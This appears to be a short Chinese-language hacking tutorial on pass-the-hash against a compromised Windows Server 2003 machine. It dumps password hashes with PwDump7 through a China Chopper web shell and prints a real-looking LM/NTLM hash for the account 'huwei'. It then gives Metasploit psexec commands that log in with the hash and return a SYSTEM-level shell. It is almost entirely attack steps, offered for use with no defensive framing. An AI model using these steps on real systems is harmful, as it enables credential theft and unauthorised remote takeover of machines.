有的时候当我们拿到系统管理员hash由于密码复杂度过高无法破解时候可以利用hash直接进行远程登录

我们用到Metasploit里面的模块 肉鸡为windwos server 2003 x32系统

1.利用抓哈希工具PwDump7.exe获取哈希

菜刀输入打开命令执行  PwDump7.exe>>1.txt

获取的哈希  

huwei:1010:759B9B71AEA7EE2779B6D67AACF4A147:165CD69A960EEF608596914B58F6DF82:::

这一段就是hash值165CD69A960EEF608596914B58F6DF82

放入放到md5解码里面没解出来

放到彩虹表里面也没跑出来

这个时候可以利用msf 了

打开kali 终端输入命令

msfconsole

输入模块利用

use exploit/windows/smb/psexec

show options 查看当前需要填写的信息

set rhost 肉鸡ip

set smbuser huwei

set smbpass 759B9B71AEA7EE2779B6D67AACF4A147:165CD69A960EEF608596914B58F6DF82

set run

shell

会反弹一个system权限cmdshell